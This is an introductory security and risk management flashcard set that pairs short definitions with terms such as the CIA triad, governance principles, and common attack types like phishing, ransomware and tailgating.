Security & Risk Management

Question 1

focuses on information systems, aiming to
reduce the impact and likelihood of threats such as
cyberattacks, employee mistakes, and natural disasters.

Answer 1

cyber risk
management

Question 1

involve identifying,
assessing, and controlling risks to an organization’s capital,
earnings, and critical assets

Answer 1

Security and risk management

Question 2

These risks can arise from
various sources, including financial uncertainty, legal
liabilities, strategic management errors, accidents, and natural disasters.

Answer 2

Security and risk management

Question 3

is a
guiding model in information
security. A comprehensive
information security strategy
includes policies and security
controls that minimize threats to these three crucial components

Answer 3

Confidentiality, Integrity and Availability

Question 4

refers to protecting
information from unauthorized
access.

Answer 4

Confidentiality

Question 5

means data are
trustworthy, complete, and have
not been accidentally altered or
modified by an unauthorized user.

Answer 5

Integrity

Question 6

means data are
accessible when you need them.

Answer 6

Availability

Question 7

Security Governance six key principles:

Answer 7

1. Responsibility
2. Strategy
3. Acquisition
4. Performance
5. Conformance
6. Human Behavior

Question 8

Clearly define roles and responsibilities for security across the
organization.

Answer 8

Responsibility

Question 9

Align security efforts with the overall business strategy

Answer 9

Strategy

Question 10

When acquiring new technologies or services, evaluate their
security implications.

Answer 10

Acquisition

Question 11

Continuously monitor and assess security performance.

Answer 11

Performance

Question 12

Ensure compliance with relevant regulations, standards, and
policies.

Answer 12

Conformance

Question 13

Promote secure behaviors among employees.

Answer 13

Human Behavior

Question 14

• Is an attempt by cybercriminals,
  hackers or other digital adversaries to access a
  computer network or system, usually for the
  purpose of altering, stealing, destroying or
  exposing information.

Answer 14

CYBERATTACK

Question 15

— is any program or code that is created with the intent to do harm to a
computer, network or server.

Answer 15

Malware

Question 16

an adversary encrypts a victim’s data and offers to provide a decryption key in exchange
for a payment.

Answer 16

Ransomware

Question 17

is a type of malicious activity that uses native, legitimate tools built
into a system to execute a cyber attack.

Answer 17

Fileless Malware

Question 18

type of unwanted, malicious software that infects a computer or other device and collects
information about a user’s web activity without their knowledge or consent.

Answer 18

Spyware

Question 19

type of spyware that watches a user’s online activity in order to determine which ads to show
them. While adware is not inherently malicious, it has an impact on the performance of a user’s device
and degrades the user experience.

Answer 19

Adware

Question 20

malware that appears to be legitimate software disguised as native operating system
programs or harmless files like free downloads. Trojans are installed through social engineering
techniques such as phishing or bait websites

Answer 20

Trojan

Question 21

a self-contained program that replicates itself and spreads its copies to other
computers.

Answer 21

Worm

Question 22

a collection of software designed to give malicious actors control of a computer
network or application. Once activated, the malicious program sets up a backdoor exploit and
may deliver additional malware.

Answer 22

Rootkits

Question 23

• are tools that record what a person types on a device.

Answer 23

Keylogger

Question 24

Common Types of Cyberattacks

Answer 24

1. Malware
2. Ransomware
3. Fileless Malware
4. Spyware
5. Adware
6. Trojan
7. Worm
8. Rootkits
9. Keylogger
10. Denial of Service Attacks
11. Phishing
12. Spear Phishing
13. Whaling

Question 25

is a malicious, targeted attack that floods a network with false
requests in order to disrupt business operations.

Answer 25

DoS Attack

Question 26

• type of cyberattack that uses email, SMS, phone, social media, and social engineering
  techniques to entice a victim to share sensitive information — such as passwords or account
  numbers.

Answer 26

Phishing

Question 27

type of phishing attack that targets specific individuals or organizations
typically through malicious emails.

Answer 27

Spear Phishing

Question 28

• is a type of social engineering attack specifically targeting senior or C-level executive
  employees with the purpose of stealing money or information, or gaining access to the person’s
  computer in order to execute further cyberattacks.

Answer 28

Whaling

Question 29

• is the act of sending fraudulent text messages designed to trick individuals into sharing sensitive data such as
  passwords, usernames and credit card numbers.

Answer 29

Smishing

Question 30

a voice phishing attack, is the fraudulent use of phone calls and voice messages pretending to be from a
reputable organization to convince individuals to reveal private information such as bank details and passwords.

Answer 30

Vishing

Question 31

• is a technique through which a cybercriminal disguises themselves as a known or trusted source.

Answer 31

Spoofing

Question 32

is a type of cyberattack in which an attacker eavesdrops on a conversation between two
targets with the goal of collecting personal data, (passwords or banking details).

Answer 32

Man in the middle Attack

Question 33

• is a technique where attackers use psychological tactics to manipulate people into taking a desired
  action.

Answer 33

Social Engineering

Question 34

is a type of physical security breach in which an unauthorized person follows an authorized
individual to enter secured premises

Answer 34

Tailgaiting